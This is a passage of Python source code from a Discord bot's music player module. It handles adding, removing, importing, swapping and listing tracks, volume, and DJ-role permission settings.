self.tracklist_time != self.tracklist_update_time:\n self.tracklist_time = self.tracklist_update_time\n tracklist_string = await _build_tracklist(\n self.bot, self.guild, self.tracklist)\n tracklist_file = utilities.get_text_as_file(tracklist_string)\n url = await utilities.upload_to_discord(\n self.bot, tracklist_file, filename='tracklist.txt')\n self.tracklist_url = url\n\n text = '[Click here]({}) to download the tracklist'.format(\n self.tracklist_url)\n asyncio.ensure_future(self.update_interface(notification_text=text))\n\n # Track list navigation\n elif command in valid_commands[6:9]:\n logger.debug(\"Track list navigation selected\")\n if command == valid_commands[7]: # Reset to the current page\n self.page = int(self.track_index / 5)\n else:\n self.page += -1 if command == valid_commands[6] else 1\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n # Voteskip\n elif command == valid_commands[9]:\n logger.debug(\"Vote skip selected\")\n if self.state != States.PLAYING or member.bot:\n continue\n elif member.id in self.skip_voters:\n self.skip_voters.remove(member.id)\n logger.debug(\"Vote by %s was removed.\", member)\n elif member in self.voice_channel.members:\n self.skip_voters.append(member.id)\n logger.debug(\"Vote by %s was added.\", member)\n else:\n continue\n self.update_listeners()\n\n # Help\n elif command == valid_commands[10]:\n logger.debug(\"Help selected\")\n button_help = (\n '⏮, ⏯, ⏭, ⏹: 
Back, Play|Pause, Next, Stop\\n'\n '🔀: Shuffle (playlist mode only)\\n'\n '🎵: Generate tracklist\\n'\n '⬅, ➡: Track page navigation\\n'\n '⏺: Reset track page to current playing track\\n'\n '⏏: Voteskip (must be listening)\\n'\n '❓: This help page'\n )\n permissions_help = (\n '**DJs only:** Only DJs can manage the player.\\n'\n '**Partially public:** Everybody can '\n 'add tracks, change track pages, and voteskip. '\n 'You can skip your own tracks as well.\\n'\n '**Public:** Everybody has full control '\n '(except removing other people\\'s '\n 'tracks and importing tracklists).'\n )\n status_help = (\n ':arrow_forward: (Blue): Playing a track\\n'\n ':pause_button: (White): Paused\\n'\n ':arrows_counterclockwise: (Orange): Loading'\n )\n command_help = (\n 'To add tracks:\\n`{0}`\\u200b{1[3].help_string}\\n'\n 'To remove tracks:\\n`{0}`\\u200b{1[4].help_string}\\n'\n 'To add tracks and/or skip to a track:\\n'\n '`{0}`\\u200b{1[11].help_string}\\n\\n'\n 'Examples (using the shortcut):\\n'\n '`{0}add Erasure Always`\\n'\n '`{0}remove 1`\\n'\n '`{0}play Toto Africa`\\n'\n '`{0}play track 7`\\n'\n 'For more, type: `help playlist`'\n ).format(\n utilities.get_invoker(self.bot, guild=self.guild),\n self.bot.commands['playlist'].subcommands)\n help_embed = discord.Embed(title=':question: Music player help')\n help_embed.add_field(name='Basic usage:', value=command_help)\n help_embed.add_field(name='Buttons:', value=button_help)\n help_embed.add_field(name='Control types:', value=permissions_help)\n help_embed.add_field(name='Status icons:', value=status_help)\n asyncio.ensure_future(member.send(embed=help_embed))\n\n except Exception as e:\n if not isinstance(e, asyncio.CancelledError):\n self.bot.extra = e\n logger.warn(\"Something bad happened (%s). %s\", type(e), e)\n\n\n# Link builders\ndef _build_hyperlink(bot, track):\n full_title = track.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n return '[{0}]({1} \"{2} (added by <@{3}>)\")'.format(title, track.url, full_title, track.userid)\n\n\ndef _build_shortlink(bot, track):\n \"\"\"Like _build_hyperlink, but for the URL portion only.\"\"\"\n display_url = 'http://dis.gd' if len(track.url) > URL_LIMIT else track.url\n display_title = _truncate_title(track.title.replace('`', ''))\n return '({} \"{} (added by <@{}>)\")'.format(display_url, display_title, track.userid)\n\n\ndef _build_track_details(bot, track, index):\n \"\"\"Creates a string that shows a one liner of the track\"\"\"\n full_title = track.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n return '[[Track {}]({} \"{} (added by <@{}>)\")] ({}) *{}*'.format(\n index + 1, track.url, full_title, track.userid,\n utilities.get_time_string(track.duration), title)\n\n\ndef _truncate_title(text, limit=TITLE_LIMIT):\n \"\"\"Truncates the text to the given limit if it is too long.\"\"\"\n return (text[:limit] + '…') if len(text) > limit else text\n\n\ndef _get_tracklist(bot, guild):\n cursor = data.db_select(\n bot, from_arg='playlist', additional='ORDER BY id ASC', table_suffix=guild.id)\n return cursor.fetchall() if cursor else ()\n\n\ndef _get_music_player(bot, guild):\n return data.get(bot, __name__, 'music_player', guild_id=guild.id, volatile=True)\n\n\nasync def _check_active_player(bot, guild, autodelete_time=5):\n \"\"\"Tries to get the active music player and whether or not the interface is active.\"\"\"\n import_lock = data.get(bot, __name__, 'import_lock', guild_id=guild.id, volatile=True)\n if import_lock:\n raise 
CBException(\"A track import is in progress. Please wait for it to finish.\")\n music_player = _get_music_player(bot, guild)\n if music_player:\n await music_player.update_state()\n use_player_interface = music_player.state is not States.STOPPED\n else:\n use_player_interface = False\n autodelete = autodelete_time if use_player_interface else 0\n return music_player, use_player_interface, autodelete\n\n\ndef _check_total_tracks_limits(bot, author):\n \"\"\"Ensures that limits of the track list are respected. Returns tracklist.\"\"\"\n\n # Limits\n user_track_limit = data.get(\n bot, __name__, key='user_track_limit', guild_id=author.guild.id,\n default=configurations.get(bot, __name__, key='max_user_track_limit'))\n total_track_limit = data.get(\n bot, __name__, key='total_track_limit', guild_id=author.guild.id,\n default=configurations.get(bot, __name__, key='max_total_track_limit'))\n\n # Checks\n tracklist = _get_tracklist(bot, author.guild)\n if data.has_custom_role(bot, __name__, 'dj', member=author): # DJs ignore limits\n return tracklist\n if total_track_limit and len(tracklist) >= total_track_limit:\n raise CBException(\"The track limit of {} has been reached.\".format(total_track_limit))\n user_tracks = [it for it in tracklist if it.userid == author.id]\n if user_track_limit and len(user_tracks) >= user_track_limit:\n raise CBException(\n \"You cannot add any more songs right now (limit {}).\".format(user_track_limit))\n return tracklist\n\n\nasync def _add_track_with_url(bot, guild, check_url, user_id=0, timestamp=0):\n \"\"\"Checks the given url and adds it to the database.\"\"\"\n options = {'format': 'bestaudio/best', 'noplaylist': True, 'default-search': 'ytsearch'}\n downloader = YoutubeDL(options)\n\n # Check for a direct URL (SO: 7160737)\n try:\n test = urlparse(check_url)\n is_url = test.scheme and test.netloc and test.path\n except:\n is_url = False\n\n if not is_url and not check_url.lower().startswith('ytsearch:'):\n check_url = 'ytsearch:' + check_url.strip()\n\n # Get information about the track\n try:\n info = await utilities.future(downloader.extract_info, check_url, download=False)\n if not is_url: # Select first result on search\n info = info['entries'][0]\n check_url = info['webpage_url']\n except BotException as e:\n raise e # Pass up\n except Exception as e:\n raise CBException(\"Failed to fetch information from the URL.\", e=e)\n return await _add_track_to_db(\n bot, guild, check_url, info, user_id=user_id, timestamp=timestamp)\n\n\nasync def _add_track_to_db(bot, guild, check_url, info, user_id=0, timestamp=0):\n \"\"\"Adds the given track info to the database.\"\"\"\n hard_threshold = configurations.get(bot, __name__, key='hard_threshold')\n bot.extra = info\n try:\n chosen_format = info['formats'][0]\n download_url = chosen_format['url']\n title = info.get('title', 'Unknown')\n thumbnail = info.get('thumbnail', None)\n likes = info.get('like_count', None)\n dislikes = info.get('dislike_count', None)\n views = info.get('view_count', None)\n description = info.get('description', None)\n upload_date = info.get('upload_date', None)\n uploader = info.get('uploader', None)\n if 'duration' in info:\n duration = int(info['duration'])\n else: # Manual download and check\n extension = chosen_format['ext']\n sound_file, filename = await utilities.download_url(\n bot, download_url, extension=extension, include_name=True)\n duration = int(TinyTag.get(sound_file).duration)\n utilities.delete_temporary_file(bot, filename)\n except BotException as e:\n raise e # Pass up\n 
except Exception as e:\n raise CBException(\"Failed to get duration from the URL.\", e=e)\n\n if duration > hard_threshold:\n raise CBException(\n \"Song is longer than the hard threshold of {} seconds.\".format(hard_threshold))\n\n # Prepare data for insertion\n extra_data = {}\n if thumbnail is not None:\n extra_data['thumbnail'] = thumbnail\n if likes is not None:\n extra_data['likes'] = likes\n if dislikes is not None:\n extra_data['dislikes'] = dislikes\n if views is not None:\n extra_data['views'] = views\n if description is not None:\n extra_data['description'] = description\n if upload_date is not None:\n extra_data['uploaded'] = '{}/{}/{}'.format(\n upload_date[4:6], upload_date[6:8], upload_date[:4])\n if uploader is not None:\n extra_data['uploader'] = uploader\n entry_data = [\n check_url,\n download_url,\n title,\n duration,\n user_id,\n timestamp if timestamp else time.time(),\n Json(extra_data)\n ]\n\n return data.db_insert(\n bot, 'playlist', table_suffix=guild.id, input_args=entry_data,\n create='playlist_template')\n\n\nasync def add_track(bot, context):\n \"\"\"Adds a track to the playlist (via command).\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check channel restriction\n channel_id = data.get(bot, __name__, 'channel', guild_id=context.guild.id)\n if not channel_id:\n raise CBException(\"No channel configured for the music player.\")\n channel_restriction = data.get_channel(bot, channel_id)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n if context.channel.id != channel_id and not is_dj:\n raise CBException(\"You can only add tracks in {}\".format(channel_restriction.mention))\n\n # Check control restriction\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n if not is_dj and control == Control.DJS:\n raise CBException(\"You must be a DJ to add tracks.\", autodelete=autodelete)\n\n default_threshold = configurations.get(bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n guild_id = context.guild.id\n threshold = data.get(bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n cutoff = data.get(bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n\n # Add track to the playlist\n check_url = context.arguments[0]\n try:\n tracklist = _check_total_tracks_limits(bot, context.author)\n cursor = await _add_track_with_url(\n bot, context.guild, check_url, user_id=context.author.id)\n track = cursor.fetchone()\n except BotException as e:\n e.autodelete = autodelete\n raise e\n\n response = '{} added {}'.format(\n context.author.mention, _build_track_details(bot, track, len(tracklist)))\n if track.duration > threshold:\n response += (\n \"\\nTrack is longer than the threshold length ({} seconds), so \"\n \"only the first {} seconds will be played\".format(threshold, cutoff))\n\n # Check the music player again, as it may have stopped while we were downloading the URL\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n music_player.update_tracklist()\n await music_player.update_interface(notification_text=response)\n\n return Response(\n embed=discord.Embed(description=response),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else 
None)\n\n\nasync def remove_track(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check track index\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n index = context.arguments[0] - 1\n if not 0 <= index < len(tracklist):\n raise CBException(\"Invalid index. Must be between 1 and {} inclusive.\".format(\n len(tracklist)), autodelete=autodelete)\n\n # Check permissions\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n track = tracklist[index]\n if control == Control.DJS and not is_dj:\n raise CBException(\"You must be a DJ to remove entries.\", autodelete=autodelete)\n elif track.userid != context.author.id and not is_dj:\n raise CBException(\n \"You must be the user who added the entry, or a DJ.\", autodelete=autodelete)\n\n data.db_delete(\n bot, 'playlist', table_suffix=context.guild.id,\n where_arg='id=%s', input_args=[track.id])\n response = '{} removed {}'.format(\n context.author.mention, _build_track_details(bot, track, index))\n\n # Change current index if necessary\n if use_player_interface:\n music_player.update_tracklist()\n if music_player.mode == Modes.PLAYLIST:\n use_skip = index == music_player.track_index\n if index <= music_player.track_index: # Shift track index down\n music_player.track_index -= 1\n if use_skip: # Skip track due to removing the current track\n music_player._skip_track()\n await music_player.update_interface(notification_text=response)\n\n return Response(\n embed=discord.Embed(description=response),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def _build_tracklist(bot, guild, tracklist):\n header = (\n '# Tracklist generated: {3[1]} {3[0]}\\r\\n'\n '# Guild: {0}\\r\\n'\n '# Total tracks: {1}\\r\\n'\n '# Runtime: {2}\\r\\n'\n ).format(\n guild.name, len(tracklist),\n utilities.get_time_string(sum(it.duration for it in tracklist), text=True, full=True),\n utilities.get_timezone_offset(\n bot, guild_id=guild.id, utc_dt=datetime.utcnow(), as_string=True))\n tracklist_text_list = [header]\n template = (\n '{}: |\\r\\n'\n ' {}\\r\\n' # Title\n ' {}\\r\\n' # URL\n ' Added by {} at {} {}\\r\\n' # Info\n ' Duration: {} ID|Timestamp: {}|{}\\r\\n' # Duration, internal info\n )\n all_guild_members = await guild.fetch_members(limit=None).flatten()\n for index, track in enumerate(tracklist):\n track_author = (\n (await data.fetch_member(bot, track.userid, safe=True, search=all_guild_members)) or\n 'Unknown')\n offset, upload_time = utilities.get_timezone_offset(\n bot, guild_id=guild.id, utc_seconds=track.timestamp, as_string=True)\n upload_time_text = time.strftime('%H:%M %m/%d/%Y', time.gmtime(upload_time))\n tracklist_text_list.append(template.format(\n index + 1, track.title, track.url, track_author, upload_time_text, offset,\n utilities.get_time_string(track.duration), track.userid, track.timestamp))\n\n return '\\r\\n'.join(tracklist_text_list)\n\n\nasync def format_tracklist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Format tracklist into user-friendly yaml\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n 
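# Nothing to format; report the empty queue\n 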
raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n\n tracklist_string = await _build_tracklist(bot, context.guild, tracklist)\n tracklist_file = utilities.get_text_as_file(tracklist_string)\n\n if use_player_interface:\n url = await utilities.upload_to_discord(bot, tracklist_file, filename='tracklist.txt')\n await music_player.update_interface(\n notification_text='[Click here]({}) to download the current tracklist'.format(url))\n return Response(content='Tracklist file updated.', delete_after=5)\n else:\n return Response(\n content='Tracks:', file=discord.File(tracklist_file, filename='tracklist.txt'))\n\n\nasync def import_tracklist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n use_youtube_playlist = 'youtube' in context.options\n if not (bool(context.message.attachments) ^ use_youtube_playlist):\n raise CBException(\n \"Must include an attachment or a YouTube playlist URL.\", autodelete=autodelete)\n if not data.has_custom_role(bot, __name__, 'dj', member=context.author):\n raise CBException(\"You must be a DJ to import tracks.\")\n if use_player_interface:\n raise CBException(\n 'The player must be stopped before importing tracks.', autodelete=autodelete)\n\n data.add(bot, __name__, 'import_lock', True, guild_id=context.guild.id, volatile=True)\n try:\n\n # Get tracklist data from playlist URL\n if use_youtube_playlist:\n downloader = YoutubeDL()\n info = await utilities.future(\n downloader.extract_info, context.options['youtube'], download=False)\n # tracklist_data = list(it['webpage_url'] for it in info['entries'])\n tracklist_data = info['entries']\n\n # Get tracklist data from file\n else:\n use_youtube_playlist = False\n file_url = context.message.attachments[0].url\n tracklist_file = await utilities.download_url(bot, file_url, use_fp=True)\n\n tracklist_data = yaml.safe_load(tracklist_file)\n if isinstance(tracklist_data, str): # Read lines instead\n tracklist_file.seek(0)\n tracklist_blob = tracklist_file.read().decode('utf8').replace('\\r\\n', '\\n').strip()\n tracklist_data = tracklist_blob.split('\\n')\n\n logger.debug(\"Tracklist data: %s\", tracklist_data)\n\n if not tracklist_data or len(tracklist_data) == 0:\n raise CBException(\"The tracklist file is empty.\")\n elif len(tracklist_data) > 100:\n raise CBException(\"Cannot import more than 100 tracks at a time.\")\n except Exception as e:\n data.remove(bot, __name__, 'import_lock', guild_id=context.guild.id, volatile=True)\n if isinstance(e, BotException):\n raise e\n else:\n raise CBException(\"Failed to load the tracklist file.\", e=e)\n\n return Response(\n content=\"Importing tracks...\",\n message_type=MessageTypes.ACTIVE,\n extra=(tracklist_data, use_youtube_playlist),\n extra_function=_import_tracklist_status)\n\n\nasync def _import_tracklist_status(bot, context, response):\n last_update_time = time.time()\n total_imported = 0\n tracklist_data, use_youtube_playlist = response.extra\n\n async def _update_notification(last_update_time):\n if time.time() - last_update_time > 5:\n await response.message.edit(content=\"Importing tracks... 
[ {} / {} ]\".format(\n total_imported, len(tracklist_data)))\n return time.time()\n return last_update_time\n\n try:\n\n if use_youtube_playlist:\n for info in tracklist_data:\n await _add_track_to_db(\n bot, context.guild, info['webpage_url'], info,\n context.author.id, int(time.time()))\n total_imported += 1\n last_update_time = await _update_notification(last_update_time)\n\n else:\n if isinstance(tracklist_data, list):\n tracklist_data = OrderedDict((it[0], it[1]) for it in enumerate(tracklist_data))\n for _, track_blob in sorted(tracklist_data.items()):\n cleaned = track_blob.strip()\n if not cleaned:\n continue\n elif '\\n' in cleaned:\n title, url, _, info, _ = track_blob.split('\\n')\n user_id, _, timestamp = info.split()[3].partition('|')\n else:\n title = url = track_blob\n user_id, timestamp = context.author.id, time.time()\n\n _check_total_tracks_limits(bot, context.author)\n await _add_track_with_url(bot, context.guild, url, int(user_id), int(timestamp))\n total_imported += 1\n last_update_time = await _update_notification(last_update_time)\n\n except Exception as e:\n data.remove(bot, __name__, 'import_lock', guild_id=context.guild.id, volatile=True)\n try:\n raise CBException(\"Failed to import track {}\".format(title), e=e)\n except NameError:\n raise CBException(\"Failed to import tracks.\", e=e)\n\n data.remove(bot, __name__, 'import_lock', guild_id=context.guild.id, volatile=True)\n await response.message.edit(content=\"Imported {} track{}.\".format(\n total_imported, '' if total_imported == 1 else 's'))\n\n\nasync def get_info(bot, context):\n \"\"\"Gets the information for the given track in the playlist.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n tracklist = _get_tracklist(bot, context.guild)\n if not tracklist:\n raise CBException(\"The playlist queue is empty.\", autodelete=autodelete)\n\n index = context.arguments[0] - 1\n if not 0 <= index < len(tracklist):\n raise CBException(\"Invalid index. 
Must be between 1 and {} inclusive.\".format(\n len(tracklist)), autodelete=autodelete)\n\n track_info = tracklist[index]\n title = _truncate_title(track_info.title)\n\n time_ago = time.time() - track_info.timestamp\n added_by_text = \"Added by <@{}> {} ago.\".format(\n track_info.userid, utilities.get_time_string(time_ago, text=True))\n duration_text = \"Duration: ({})\".format(utilities.get_time_string(track_info.duration))\n response = \"Info for track {}:\".format(index + 1)\n\n if use_player_interface: # Add notification\n track_link = _build_hyperlink(bot, track_info)\n info_text = \"{}\\n{}\\n{}\\n{}\".format(response, track_link, duration_text, added_by_text)\n music_player.page = int(index / 5)\n await music_player.update_interface(notification_text=info_text, ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=autodelete)\n else:\n response += \"\\n{}\\n{}\\n{}\\n{}\".format(title, track_info.url, duration_text, added_by_text)\n return Response(content=response)\n\n\nasync def set_volume(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check control restriction\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n if not is_dj and control != Control.ALL:\n raise CBException(\"You must be a DJ to change the volume.\", autodelete=autodelete)\n\n volume = context.arguments[0]\n data.add(bot, __name__, 'volume', volume, guild_id=context.guild.id)\n if use_player_interface:\n music_player.update_config()\n await music_player.update_interface(\n notification_text='<@{}> set the volume to {:.2f}%'.format(\n context.author.id, volume * 100))\n \n return Response(\n content=\"Volume set to {:.2f}%.\".format(volume * 100),\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def configure_player(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(\n bot, context.guild, autodelete_time=10)\n options = context.options\n\n if use_player_interface:\n if 'switchmode' in options:\n raise CBException(\n \"Cannot switch player modes while it is active.\", autodelete=autodelete)\n elif 'channel' in options:\n raise CBException(\n \"Cannot set text channel while the player is active.\", autodelete=autodelete)\n\n guild_id = context.guild.id\n changes = []\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n is_mod = context.elevation > 0\n dj_prereq = \"You must be a DJ in order to \"\n mod_prereq = \"You must be a bot moderator in order to \"\n\n if 'threshold' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the length threshold.\")\n threshold = options['threshold']\n data.add(bot, __name__, 'threshold', threshold, guild_id=guild_id)\n changes.append('Duration threshold set to {} seconds.'.format(threshold))\n\n if 'cutoff' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the length cutoff.\")\n cutoff = options['cutoff']\n data.add(bot, __name__, 'cutoff', cutoff, guild_id=guild_id)\n changes.append('Cutoff set to {} seconds.'.format(cutoff))\n\n if 'usertracks' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the user track limit.\")\n limit = options['usertracks']\n data.add(bot, __name__, 
'user_track_limit', limit, guild_id=guild_id)\n changes.append('User track limit set to {} track(s).'.format(limit))\n\n if 'totaltracks' in options:\n if not is_dj:\n raise CBException(dj_prereq + \"change the total track limit.\")\n limit = options['totaltracks']\n data.add(bot, __name__, 'total_track_limit', limit, guild_id=guild_id)\n changes.append('Total track limit set to {} track(s).'.format(limit))\n\n if 'djrole' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"change the DJ role.\")\n dj_role = options['djrole']\n data.add_custom_role(bot, __name__, 'dj', dj_role)\n changes.append('Set the DJ role to {}.'.format(dj_role.mention))\n\n if 'channel' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"change the player channel.\")\n text_channel = options['channel']\n data.add(bot, __name__, 'channel', text_channel.id, guild_id=guild_id)\n changes.append('Set the text channel restriction to {}.'.format(text_channel.mention))\n\n if 'switchcontrol' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"cycle control modes.\")\n control = data.get(bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n control = 0 if control == len(Control) - 1 else control + 1\n data.add(bot, __name__, 'control', control, guild_id=guild_id)\n changes.append('Cycled the playlist permissions control mode to: {}'.format(\n ('Public', 'Partially public', 'DJs only')[control]))\n\n if 'switchmode' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"cycle player modes.\")\n mode = data.get(bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n mode = 0 if mode == len(Modes) - 1 else mode + 1\n data.add(bot, __name__, 'mode', mode, guild_id=guild_id)\n changes.append('Cycled the playlist mode to: {}'.format(('Playlist', 'Queue')[mode]))\n\n if 'mirrorchat' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"toggle chat mirroring.\")\n mirror = not data.get(bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n data.add(bot, __name__, 'mirror_chat', mirror, guild_id=guild_id)\n changes.append('{}abled chat mirroring.'.format('En' if mirror else 'Dis'))\n\n if 'autodisconnect' in options:\n if not is_mod:\n raise CBException(mod_prereq + \"toggle automatic disconnecting.\")\n auto_disconnect = not data.get(\n bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n data.add(bot, __name__, 'auto_disconnect', auto_disconnect, guild_id=guild_id)\n changes.append('{}abled auto disconnecting.'.format('En' if auto_disconnect else 'Dis'))\n\n # Defaults\n default_threshold = configurations.get(bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n default_total_track_limit = configurations.get(bot, __name__, key='max_total_track_limit')\n default_user_track_limit = configurations.get(bot, __name__, key='max_user_track_limit')\n\n # Format and display all settings\n threshold = data.get(bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n cutoff = data.get(bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n total_track_limit = data.get(\n bot, __name__, key='total_track_limit',\n guild_id=guild_id, default=default_total_track_limit)\n user_track_limit = data.get(\n bot, __name__, key='user_track_limit',\n guild_id=guild_id, default=default_user_track_limit)\n dj_role = data.get_custom_role(bot, __name__, 'dj', context.guild)\n control = data.get(bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n 
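# The values below are read only to render the configuration summary embed\n 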
mode = data.get(bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n chat_mirroring = data.get(bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n auto_disconnect = data.get(bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n text_channel_id = data.get(bot, __name__, 'channel', guild_id=guild_id)\n text_channel = context.guild.get_channel(text_channel_id)\n\n embed = discord.Embed(\n title='Player configuration', description=(\n 'Text channel: {}\nTotal track limit: {}\n'\n 'User track limit: {}\nThreshold: {}\nCutoff: {}\n'\n 'DJ Role: {}\nControl: {}\nPlayer mode: {}\n'\n 'Chat mirroring: {}\nAutomatic disconnecting: {}'.format(\n text_channel.mention if text_channel else 'None',\n '{} tracks'.format(total_track_limit),\n '{} tracks'.format(user_track_limit),\n '{} seconds'.format(threshold),\n '{} seconds'.format(cutoff),\n dj_role.mention if dj_role else 'None',\n ('Public', 'Partially public', 'DJs only')[control],\n ('Repeating playlist', 'Single play queue')[mode],\n chat_mirroring,\n auto_disconnect)\n )\n )\n\n if changes:\n embed.add_field(name=\"Changes\", value='\\n'.join(changes))\n if use_player_interface:\n music_player.update_config()\n await music_player.update_interface('{}:\\n{}'.format(\n context.author.mention, '\\n'.join(changes)))\n\n return Response(\n embed=embed,\n message_type=MessageTypes.REPLACE if use_player_interface else MessageTypes.NORMAL,\n delete_after=autodelete if use_player_interface else None,\n extra=autodelete if use_player_interface else None)\n\n\nasync def clear_playlist(bot, context):\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n raise CBException(\n \"Cannot clear playlist tracks when the player is active.\", autodelete=autodelete)\n\n return Response(\n content=\"Say 'yes' to confirm clearing the playlist.\",\n message_type=MessageTypes.WAIT,\n extra_function=_confirm_clear_playlist,\n extra={\n 'event': 'message',\n 'kwargs': {\n 'timeout': 30, # Default 300\n 'check': lambda m: m.author == context.author,\n }\n }\n )\n\n\nasync def _confirm_clear_playlist(bot, context, response, result):\n \"\"\"Menu for confirming a playlist clear.\"\"\"\n if result is None: # Timed out\n edit = 'Playlist clear timed out.'\n\n elif result.content.lower() == 'yes':\n # music_player = _get_music_player(bot, context.guild)\n _, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if use_player_interface:\n raise CBException(\n \"Cannot clear playlist tracks when the player is active.\", autodelete=autodelete)\n data.db_drop_table(bot, 'playlist', table_suffix=context.guild.id, safe=True)\n edit = 'Playlist has been cleared.'\n\n else:\n edit = 'Playlist clear cancelled.'\n\n await response.message.edit(content=edit)\n\n\nasync def skip_to_page(bot, context):\n \"\"\"Skips to a certain page of the tracklist in the player interface.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n if not use_player_interface:\n raise CBException(\"The player interface must be active.\")\n\n # Check page number\n tracklist = music_player.tracklist\n page_number = context.arguments[0] - 1\n total_pages = max(int((len(tracklist) + 4) / 5), 1)\n if not 0 <= page_number <= total_pages - 1:\n raise CBException(\n \"Invalid page number. 
Must be between 1 and {} inclusive.\".format(total_pages),\n autodelete=autodelete)\n\n music_player.page = page_number\n await music_player.update_interface(ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=1)\n\n\nasync def swap_tracks(bot, context):\n \"\"\"Swaps the given two tracks in the playlist.\"\"\"\n music_player, use_player_interface, autodelete = await _check_active_player(bot, context.guild)\n\n # Check control restriction\n control = data.get(\n bot, __name__, 'control', guild_id=context.guild.id, default=Control.PARTIAL)\n is_dj = data.has_custom_role(bot, __name__, 'dj', member=context.author)\n if not is_dj and control != Control.ALL:\n raise CBException(\"You must be a DJ to swap tracks.\", autodelete=autodelete)\n \n # Check index validity\n tracklist = _get_tracklist(bot, context.guild)\n swap = []\n for index in context.arguments:\n if not 1 <= index <= len(tracklist):\n raise CBException(\n \"Index must be between 1 and {}\".format(len(tracklist)),\n autodelete=autodelete)\n swap.append(tracklist[index - 1])\n\n # Swap tracks\n set_arg = (\n '(url, downloadurl, title, duration, userid, timestamp, extra) = '\n '(%s, %s, %s, %s, %s, %s, %s)')\n for index, track in enumerate(swap):\n data.db_update(\n bot, 'playlist', table_suffix=context.guild.id,\n set_arg=set_arg, where_arg='id=%s', input_args=[\n track.url, track.downloadurl, track.title, track.duration, track.userid,\n track.timestamp, Json(track.extra), swap[index - 1].id])\n\n # Add notification and skip track if necessary\n response = '{} swapped tracks {} and {}'.format(context.author.mention, *context.arguments)\n if use_player_interface:\n music_player.update_tracklist()\n if music_player.track_index + 1 in context.arguments:\n asyncio.ensure_future(music_player.play(track_index=music_player.track_index))\n await music_player.update_interface(notification_text=response, ignore_ratelimit=True)\n return Response(message_type=MessageTypes.REPLACE, extra=autodelete)\n else:\n return Response(content=response)\n\n\nasync def _check_player_restrictions(\n bot, context, music_player, use_player_interface, autodelete):\n \"\"\"Ensures that the user in the context can interact with the player.\"\"\"\n\n # Channel restriction checks\n channel_restriction_id = data.get(bot, __name__, 'channel', guild_id=context.guild.id)\n if channel_restriction_id not in [it.id for it in context.guild.channels]:\n raise CBException(\n \"The music player does not have an assigned text channel. 
